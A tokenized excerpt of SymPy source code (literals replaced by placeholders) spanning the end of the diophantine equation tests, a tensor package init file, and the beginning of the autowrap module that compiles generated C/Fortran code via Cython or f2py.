<NUM_LIT:1> ) <EOL> assert base_solution_linear ( <NUM_LIT:4> , <NUM_LIT:8> , <NUM_LIT:12> , t ) == ans <EOL> assert base_solution_linear ( <NUM_LIT:4> , <NUM_LIT:8> , <NUM_LIT:12> , t = None ) == tuple ( _ . subs ( t , <NUM_LIT:0> ) for _ in ans ) <EOL> assert cornacchia ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:20> ) is None <EOL> assert cornacchia ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> ) == set ( [ ( <NUM_LIT:1> , <NUM_LIT:2> ) ] ) <EOL> assert cornacchia ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> ) == set ( [ ( <NUM_LIT:3> , <NUM_LIT:2> ) ] ) <EOL> raises ( ValueError , lambda : reconstruct ( <NUM_LIT:4> , <NUM_LIT:20> , <NUM_LIT:1> ) ) <EOL> assert gaussian_reduce ( <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:3> ) == ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> eq = - w ** <NUM_LIT:2> - x ** <NUM_LIT:2> - y ** <NUM_LIT:2> + z ** <NUM_LIT:2> <EOL> assert diop_general_pythagorean ( eq ) == diop_general_pythagorean ( - eq ) == ( m1 ** <NUM_LIT:2> + m2 ** <NUM_LIT:2> - m3 ** <NUM_LIT:2> , <NUM_LIT:2> * m1 * m3 , <EOL> <NUM_LIT:2> * m2 * m3 , m1 ** <NUM_LIT:2> + m2 ** <NUM_LIT:2> + m3 ** <NUM_LIT:2> ) <EOL> assert check_param ( S ( <NUM_LIT:3> ) + x / <NUM_LIT:3> , S ( <NUM_LIT:4> ) + x / <NUM_LIT:2> , S ( <NUM_LIT:2> ) , x ) == ( None , None ) <EOL> assert check_param ( S ( <NUM_LIT:3> ) / <NUM_LIT:2> , S ( <NUM_LIT:4> ) + x , S ( <NUM_LIT:2> ) , x ) == ( None , None ) <EOL> assert check_param ( S ( <NUM_LIT:4> ) + x , S ( <NUM_LIT:3> ) / <NUM_LIT:2> , S ( <NUM_LIT:2> ) , x ) == ( None , None ) <EOL> assert _nint_or_floor ( <NUM_LIT:16> , <NUM_LIT:10> ) == <NUM_LIT:2> <EOL> assert _odd ( <NUM_LIT:1> ) == ( not _even ( <NUM_LIT:1> ) ) == True <EOL> assert _odd ( <NUM_LIT:0> ) == ( not _even ( <NUM_LIT:0> ) ) == False <EOL> assert _remove_gcd ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ) == ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> raises ( TypeError , lambda : _remove_gcd ( ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ) ) ) <EOL> assert sqf_normal ( <NUM_LIT:2> * <NUM_LIT:3> ** <NUM_LIT:2> * <NUM_LIT:5> , <NUM_LIT:2> * <NUM_LIT:5> * <NUM_LIT:11> , <NUM_LIT:2> * <NUM_LIT:7> ** <NUM_LIT:2> * <NUM_LIT:11> ) == ( <NUM_LIT:11> , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> raises ( NotImplementedError , lambda : diophantine ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + x * y + <NUM_LIT:2> * y * z - <NUM_LIT:12> ) ) <EOL> raises ( NotImplementedError , lambda : diophantine ( x ** <NUM_LIT:3> + y ** <NUM_LIT:2> ) ) <EOL> def test_holzer ( ) : <EOL> assert holzer ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> ) == ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> ) <EOL> assert holzer ( <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:10> ) == ( <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:2> ) <EOL> raises ( ValueError , lambda : holzer ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ XFAIL <EOL> def test_fail_holzer ( ) : <EOL> eq = lambda x , y , z : a * x ** <NUM_LIT:2> + b * y ** <NUM_LIT:2> - c * z ** <NUM_LIT:2> <EOL> a , b , c = <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> <EOL> x , y , z = xyz = <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:11> <EOL> X , Y , Z = ans = <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> <EOL> assert eq ( * xyz ) == <NUM_LIT:0> <EOL> assert eq ( * ans ) == <NUM_LIT:0> <EOL> assert max ( a * x ** <NUM_LIT:2> , b * y ** <NUM_LIT:2> , c * z ** <NUM_LIT:2> ) <= a * b * c <EOL> assert max ( a * X ** <NUM_LIT:2> , b * Y ** <NUM_LIT:2> , c * Z ** <NUM_LIT:2> ) <= a * b * c <EOL> h = holzer ( x , y , z , a , b , c ) <EOL> assert h == ans <EOL> def test_issue_9539 ( ) : <EOL> assert diophantine ( <NUM_LIT:6> * w + <NUM_LIT:9> * y + <NUM_LIT:20> * x - z ) == set ( [ ( t_0 , t_1 , t_1 + t_2 , <NUM_LIT:6> * t_0 + <NUM_LIT> * t_1 + <NUM_LIT:9> * t_2 ) ] ) <EOL> def test_issue_8943 ( ) : <EOL> assert diophantine ( <EOL> ( <NUM_LIT:3> * ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> ) - <NUM_LIT> * ( x * y + y * z + z * x ) ) ) == set ( [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ] ) <EOL> def test_diop_sum_of_even_powers ( ) : <EOL> eq = x ** <NUM_LIT:4> + y ** <NUM_LIT:4> + z ** <NUM_LIT:4> - <NUM_LIT> <EOL> assert diop_solve ( eq ) == set ( [ ( <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ] ) <EOL> assert diop_general_sum_of_even_powers ( eq , <NUM_LIT:2> ) == set ( <EOL> [ ( <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ] ) <EOL> raises ( NotImplementedError , lambda : diop_general_sum_of_even_powers ( - eq , <NUM_LIT:2> ) ) <EOL> neg = symbols ( '<STR_LIT>' , negative = True ) <EOL> eq = x ** <NUM_LIT:4> + y ** <NUM_LIT:4> + neg ** <NUM_LIT:4> - <NUM_LIT> <EOL> assert diop_general_sum_of_even_powers ( eq ) == set ( [ ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ] ) <EOL> assert diophantine ( x ** <NUM_LIT:4> + y ** <NUM_LIT:4> + <NUM_LIT:2> ) == set ( ) <EOL> assert diop_general_sum_of_even_powers ( x ** <NUM_LIT:4> + y ** <NUM_LIT:4> - <NUM_LIT:2> , limit = <NUM_LIT:0> ) == set ( ) <EOL> def test_sum_of_squares_powers ( ) : <EOL> tru = set ( [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:11> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:9> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:8> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:9> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:7> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:10> ) , ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:9> ) , ( <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:9> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) , ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:8> ) ] ) <EOL> eq = u ** <NUM_LIT:2> + v ** <NUM_LIT:2> + x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> <EOL> ans = diop_general_sum_of_squares ( eq , oo ) <EOL> assert len ( ans ) == <NUM_LIT> <EOL> raises ( ValueError , lambda : list ( sum_of_squares ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) ) <EOL> assert list ( sum_of_squares ( - <NUM_LIT:10> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:2> , <NUM_LIT:3> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:0> , <NUM_LIT:3> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:0> , <NUM_LIT:3> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:4> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:2> , ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:5> , <NUM_LIT:1> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:50> , <NUM_LIT:2> ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:7> ) , ( <NUM_LIT:5> , <NUM_LIT:5> ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:11> , <NUM_LIT:5> , True ) ) == [ <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:8> , <NUM_LIT:8> ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> assert [ len ( list ( sum_of_squares ( i , <NUM_LIT:5> , True ) ) ) for i in range ( <NUM_LIT:30> ) ] == [ <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <EOL> <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> assert [ len ( list ( sum_of_squares ( i , <NUM_LIT:5> ) ) ) for i in range ( <NUM_LIT:30> ) ] == [ <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> for i in range ( <NUM_LIT:30> ) : <EOL> s1 = set ( sum_of_squares ( i , <NUM_LIT:5> , True ) ) <EOL> assert not s1 or all ( sum ( j ** <NUM_LIT:2> for j in t ) == i for t in s1 ) <EOL> s2 = set ( sum_of_squares ( i , <NUM_LIT:5> ) ) <EOL> assert all ( sum ( j ** <NUM_LIT:2> for j in t ) == i for t in s2 ) <EOL> raises ( ValueError , lambda : list ( sum_of_powers ( <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:1> ) ) ) <EOL> raises ( ValueError , lambda : list ( sum_of_powers ( <NUM_LIT:2> , <NUM_LIT:1> , - <NUM_LIT:1> ) ) ) <EOL> assert list ( sum_of_powers ( - <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> ) ) == [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ] <EOL> assert list ( sum_of_powers ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:2> , ) ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:4> ) , ( <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:3> ** <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:1> ) ) == [ ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:3> ** <NUM_LIT:6> , <NUM_LIT:3> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:9> , ) ] and ( <NUM_LIT:9> ** <NUM_LIT:3> == <NUM_LIT:3> ** <NUM_LIT:6> ) <EOL> assert list ( sum_of_powers ( <NUM_LIT:2> ** <NUM_LIT:1000> , <NUM_LIT:5> , <NUM_LIT:2> ) ) == [ ] <EOL> def test__can_do_sum_of_squares ( ) : <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:3> , - <NUM_LIT:1> ) is False <EOL> assert _can_do_sum_of_squares ( - <NUM_LIT:3> , <NUM_LIT:1> ) is False <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:3> , <NUM_LIT:2> ) is False <EOL> def test_issue_9538 ( ) : <EOL> eq = x - <NUM_LIT:3> * y + <NUM_LIT:2> <EOL> assert diophantine ( eq , syms = [ y , x ] ) == set ( [ ( t_0 , <NUM_LIT:3> * t_0 - <NUM_LIT:2> ) ] ) <EOL> raises ( TypeError , lambda : diophantine ( eq , syms = set ( [ y , x ] ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from . indexed import IndexedBase , Idx , Indexed <EOL> from . index_methods import get_contraction_structure , get_indices </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> _doctest_depends_on = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' : ( '<STR_LIT>' , ) } <EOL> import sys <EOL> import os <EOL> import shutil <EOL> import tempfile <EOL> from subprocess import STDOUT , CalledProcessError , check_output <EOL> from string import Template <EOL> from sympy . core . cache import cacheit <EOL> from sympy . core . compatibility import range , iterable <EOL> from sympy . core . function import Lambda <EOL> from sympy . core . relational import Eq <EOL> from sympy . core . symbol import Dummy , Symbol <EOL> from sympy . tensor . indexed import Idx , IndexedBase <EOL> from sympy . utilities . codegen import ( make_routine , get_code_generator , <EOL> OutputArgument , InOutArgument , InputArgument , <EOL> CodeGenArgumentListError , Result , ResultBase , CCodeGen ) <EOL> from sympy . utilities . lambdify import implemented_function <EOL> from sympy . utilities . decorator import doctest_depends_on <EOL> class CodeWrapError ( Exception ) : <EOL> pass <EOL> class CodeWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> _filename = "<STR_LIT>" <EOL> _module_basename = "<STR_LIT>" <EOL> _module_counter = <NUM_LIT:0> <EOL> @ property <EOL> def filename ( self ) : <EOL> return "<STR_LIT>" % ( self . _filename , CodeWrapper . _module_counter ) <EOL> @ property <EOL> def module_name ( self ) : <EOL> return "<STR_LIT>" % ( self . _module_basename , CodeWrapper . _module_counter ) <EOL> def __init__ ( self , generator , filepath = None , flags = [ ] , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> self . generator = generator <EOL> self . filepath = filepath <EOL> self . flags = flags <EOL> self . quiet = not verbose <EOL> @ property <EOL> def include_header ( self ) : <EOL> return bool ( self . filepath ) <EOL> @ property <EOL> def include_empty ( self ) : <EOL> return bool ( self . filepath ) <EOL> def _generate_code ( self , main_routine , routines ) : <EOL> routines . append ( main_routine ) <EOL> self . generator . write ( <EOL> routines , self . filename , True , self . include_header , <EOL> self . include_empty ) <EOL> def wrap_code ( self , routine , helpers = [ ] ) : <EOL> workdir = self . filepath or tempfile . mkdtemp ( "<STR_LIT>" ) <EOL> if not os . access ( workdir , os . F_OK ) : <EOL> os . mkdir ( workdir ) <EOL> oldwork = os . getcwd ( ) <EOL> os . chdir ( workdir ) <EOL> try : <EOL> sys . path . append ( workdir ) <EOL> self . _generate_code ( routine , helpers ) <EOL> self . _prepare_files ( routine ) <EOL> self . _process_files ( routine ) <EOL> mod = __import__ ( self . module_name ) <EOL> finally : <EOL> sys . path . remove ( workdir ) <EOL> CodeWrapper . _module_counter += <NUM_LIT:1> <EOL> os . chdir ( oldwork ) <EOL> if not self . filepath : <EOL> try : <EOL> shutil . rmtree ( workdir ) <EOL> except OSError : <EOL> pass <EOL> return self . _get_wrapped_function ( mod , routine . name ) <EOL> def _process_files ( self , routine ) : <EOL> command = self . command <EOL> command . extend ( self . flags ) <EOL> try : <EOL> retoutput = check_output ( command , stderr = STDOUT ) <EOL> except CalledProcessError as e : <EOL> raise CodeWrapError ( <EOL> "<STR_LIT>" % ( <EOL> "<STR_LIT:U+0020>" . join ( command ) , e . output . decode ( ) ) ) <EOL> if not self . quiet : <EOL> print ( retoutput ) <EOL> class DummyWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> template = """<STR_LIT>""" <EOL> def _prepare_files ( self , routine ) : <EOL> return <EOL> def _generate_code ( self , routine , helpers ) : <EOL> with open ( '<STR_LIT>' % self . module_name , '<STR_LIT:w>' ) as f : <EOL> printed = "<STR_LIT:U+002CU+0020>" . join ( <EOL> [ str ( res . expr ) for res in routine . result_variables ] ) <EOL> args = filter ( lambda x : not isinstance ( <EOL> x , OutputArgument ) , routine . arguments ) <EOL> retvals = [ ] <EOL> for val in routine . result_variables : <EOL> if isinstance ( val , Result ) : <EOL> retvals . append ( '<STR_LIT>' ) <EOL> else : <EOL> retvals . append ( val . result_var ) <EOL> print ( DummyWrapper . template % { <EOL> '<STR_LIT:name>' : routine . name , <EOL> '<STR_LIT>' : printed , <EOL> '<STR_LIT:args>' : "<STR_LIT:U+002CU+0020>" . join ( [ str ( a . name ) for a in args ] ) , <EOL> '<STR_LIT>' : "<STR_LIT:U+002CU+0020>" . join ( [ str ( val ) for val in retvals ] ) <EOL> } , end = "<STR_LIT>" , file = f ) <EOL> def _process_files ( self , routine ) : <EOL> return <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name ) <EOL> class CythonCodeWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> setup_template = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pyx_imports = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pyx_header = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pyx_func = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CythonCodeWrapper , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _need_numpy = False <EOL> @ property <EOL> def command ( self ) : <EOL> command = [ sys . executable , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> return command <EOL> def _prepare_files ( self , routine ) : <EOL> pyxfilename = self . module_name + '<STR_LIT>' <EOL> codefilename = "<STR_LIT>" % ( self . filename , self . generator . code_extension ) <EOL> with open ( pyxfilename , '<STR_LIT:w>' ) as f : <EOL> self . dump_pyx ( [ routine ] , f , self . filename ) <EOL> ext_args = [ repr ( self . module_name ) , repr ( [ pyxfilename , codefilename ] ) ] <EOL> if self . _need_numpy : <EOL> np_import = '<STR_LIT>' <EOL> np_includes = '<STR_LIT>' <EOL> else : <EOL> np_import = '<STR_LIT>' <EOL> np_includes = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as f : <EOL> f . write ( self . setup_template . format ( ext_args = "<STR_LIT:U+002CU+0020>" . join ( ext_args ) , <EOL> np_import = np_import , <EOL> np_includes = np_includes ) ) <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name + '<STR_LIT>' ) <EOL> def dump_pyx ( self , routines , f , prefix ) : <EOL> """<STR_LIT>""" <EOL> headers = [ ] <EOL> functions = [ ] <EOL> for routine in routines : <EOL> prototype = self . generator . get_prototype ( routine ) <EOL> headers . append ( self . pyx_header . format ( header_file = prefix , <EOL> prototype = prototype ) ) <EOL> py_rets , py_args , py_loc , py_inf = self . _partition_args ( routine . arguments ) <EOL> name = routine . name <EOL> arg_string = "<STR_LIT:U+002CU+0020>" . join ( self . _prototype_arg ( arg ) for arg in py_args ) <EOL> local_decs = [ ] <EOL> for arg , val in py_inf . items ( ) : <EOL> proto = self . _prototype_arg ( arg ) <EOL> mat , ind = val <EOL> local_decs . append ( "<STR_LIT>" . format ( proto , mat , ind ) ) <EOL> local_decs . extend ( [ "<STR_LIT>" . format ( self . _declare_arg ( a ) ) for a in py_loc ] ) <EOL> declarations = "<STR_LIT:\n>" . join ( local_decs ) <EOL> if declarations : <EOL> declarations = declarations + "<STR_LIT:\n>" <EOL> args_c = "<STR_LIT:U+002CU+0020>" . join ( [ self . _call_arg ( a ) for a in routine . arguments ] ) <EOL> rets = "<STR_LIT:U+002CU+0020>" . join ( [ str ( r . name ) for r in py_rets ] ) <EOL> if routine . results : <EOL> body = '<STR_LIT>' % ( routine . name , args_c ) <EOL> if rets : <EOL> body = body + '<STR_LIT:U+002CU+0020>' + rets <EOL> else : <EOL> body = '<STR_LIT>' % ( routine . name , args_c ) <EOL> body = body + '<STR_LIT>' + rets <EOL> functions . append ( self . pyx_func . format ( name = name , arg_string = arg_string , <EOL> declarations = declarations , body = body ) ) <EOL> if self . _need_numpy : <EOL> f . write ( self . pyx_imports ) <EOL> f . write ( '<STR_LIT:\n>' . join ( headers ) ) <EOL> f . write ( '<STR_LIT:\n>' . join ( functions ) ) <EOL> def _partition_args ( self , args ) : <EOL> """<STR_LIT>""" <EOL> py_args = [ ] <EOL> py_returns = [ ] <EOL> py_locals = [ ] <EOL> py_inferred = { } <EOL> for arg in args : <EOL> if isinstance ( arg , OutputArgument ) : <EOL> py_returns . append ( arg ) <EOL> py_locals . append ( arg ) <EOL> elif isinstance ( arg , InOutArgument ) : <EOL> py_returns . append ( arg ) <EOL> py_args . append ( arg ) <EOL> else : <EOL> py_args . append ( arg ) <EOL> if isinstance ( arg , ( InputArgument , InOutArgument ) ) and arg . dimensions : <EOL> dims = [ d [ <NUM_LIT:1> ] + <NUM_LIT:1> for d in arg . dimensions ] <EOL> sym_dims = [ ( i , d ) for ( i , d ) in enumerate ( dims ) if isinstance ( d , Symbol ) ] <EOL> for ( i , d ) in sym_dims : <EOL> py_inferred [ d ] = ( arg . name , i ) <EOL> for arg in args : <EOL> if arg . name in py_inferred : <EOL> py_inferred [ arg ] = py_inferred . pop ( arg . name ) <EOL> py_args = [ a for a in py_args if a not in py_inferred ] <EOL> return py_returns , py_args , py_locals , py_inferred <EOL> def _prototype_arg ( self , arg ) : <EOL> mat_dec = "<STR_LIT>" <EOL> np_types = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:int>' : '<STR_LIT>' } <EOL> t = arg . get_datatype ( '<STR_LIT:c>' ) <EOL> if arg . dimensions : <EOL> self . _need_numpy = True <EOL> ndim = len ( arg . dimensions ) <EOL> mtype = np_types [ t ] <EOL> return mat_dec . format ( mtype = mtype , ndim = ndim , name = arg . name ) <EOL> else : <EOL> return "<STR_LIT>" % ( t , str ( arg . name ) ) <EOL> def _declare_arg ( self , arg ) : <EOL> proto = self . _prototype_arg ( arg ) <EOL> if arg . dimensions : <EOL> shape = '<STR_LIT:(>' + '<STR_LIT:U+002C>' . join ( str ( i [ <NUM_LIT:1> ] + <NUM_LIT:1> ) for i in arg . dimensions ) + '<STR_LIT:)>' <EOL> return proto + "<STR_LIT>" . format ( shape = shape ) <EOL> else : <EOL> return proto + "<STR_LIT>" <EOL> def _call_arg ( self , arg ) : <EOL> if arg . dimensions : <EOL> t = arg . get_datatype ( '<STR_LIT:c>' ) <EOL> return "<STR_LIT>" . format ( t , arg . name ) <EOL> elif isinstance ( arg , ResultBase ) : <EOL> return "<STR_LIT>" . format ( arg . name ) <EOL> else : <EOL> return str ( arg . name ) <EOL> class F2PyCodeWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def command ( self ) : <EOL> filename = self . filename + '<STR_LIT:.>' + self . generator . code_extension <EOL> args = [ '<STR_LIT:-c>' , '<STR_LIT>' , self . module_name , filename ] <EOL> command = [ sys . executable , "<STR_LIT:-c>" , "<STR_LIT>" ] + args <EOL> return command <EOL> def _prepare_files ( self , routine ) : <EOL> pass <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name ) <EOL> def _get_code_wrapper_class ( backend ) : <EOL> wrappers = { '<STR_LIT>' : F2PyCodeWrapper , '<STR_LIT>' : CythonCodeWrapper , <EOL> '<STR_LIT>' : DummyWrapper } <EOL> return wrappers [ backend . upper ( ) ] <EOL> _lang_lookup = { '<STR_LIT>' : ( '<STR_LIT:C>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:C>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) } <EOL> def _infer_language ( backend ) : <EOL> """<STR_LIT>""" <EOL> langs = _lang_lookup . get ( backend . upper ( ) , False ) <EOL> if not langs : <EOL> raise ValueError ( "<STR_LIT>" + backend ) <EOL> return langs [ <NUM_LIT:0> ] <EOL> def _validate_backend_language ( backend , language ) : <EOL> """<STR_LIT>""" <EOL> langs = _lang_lookup . get ( backend . upper ( ) , False ) <EOL> if not langs : <EOL> raise ValueError ( "<STR_LIT>" + backend ) <EOL> if language . upper ( ) not in langs : <EOL> raise ValueError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( backend , language ) ) <EOL> @ cacheit <EOL> @ doctest_depends_on ( exe = ( '<STR_LIT>' , '<STR_LIT>' ) , modules = ( '<STR_LIT>' , ) ) <EOL> def autowrap ( <EOL> expr , language = None , backend = '<STR_LIT>' , tempdir = None , args = None , flags = None , <EOL> verbose = False , helpers = None ) : <EOL> """<STR_LIT>""" <EOL> if language : <EOL> _validate_backend_language ( backend , language ) <EOL> else : <EOL> language = _infer_language ( backend ) <EOL> helpers = [ helpers ] if helpers else ( ) <EOL> flags = flags if flags else ( ) <EOL> args = list ( args ) if iterable ( args , exclude = set ) else args <EOL> code_generator = get_code_generator ( language , "<STR_LIT>" ) <EOL> CodeWrapperClass = _get_code_wrapper_class ( backend ) <EOL> code_wrapper = CodeWrapperClass ( 